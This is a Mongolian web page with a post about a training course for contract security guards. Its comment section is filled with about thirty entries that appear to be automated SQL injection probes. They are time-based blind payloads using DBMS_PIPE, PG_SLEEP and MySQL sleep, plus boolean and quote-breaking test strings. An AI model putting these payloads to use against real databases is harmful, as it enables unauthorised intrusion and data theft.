• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

"Гэрээт харуул хамгаалалтын ажилтан бэлтгэх сургалт"

2020-12-17
ncMUFCMU 1'"
2021-01-20 Хариулах
ncMUFCMU 1����%2527%2522
2021-01-20 Хариулах
ncMUFCMU @@wdqlN
2021-01-20 Хариулах
ncMUFCMU '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
ncMUFCMU *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
ncMUFCMU mvZOGgYr')) OR 953=(SELECT 953 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU J6s9Xdcx') OR 973=(SELECT 973 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 6nkrEpa5' OR 12=(SELECT 12 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -1)) OR 887=(SELECT 887 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5) OR 843=(SELECT 843 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5 OR 926=(SELECT 926 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2021-01-20 Хариулах
ncMUFCMU 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2021-01-20 Хариулах
ncMUFCMU if(now()=sysdate(),sleep(15),0)
2021-01-20 Хариулах
ncMUFCMU -1 OR 3+313-313-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU RLIKE (SELECT (CASE WHEN (211=211) THEN 1 ELSE 0x28 END)) --
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU -1 OR 2+313-313-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU z0AUNECj
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
1'"
2021-01-20 Хариулах
1����%2527%2522
2021-01-20 Хариулах
@@Nk9Xf
2021-01-20 Хариулах
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
azMdUBKx')) OR 95=(SELECT 95 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
l8fUnrz6') OR 709=(SELECT 709 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 1
2021-01-20 Хариулах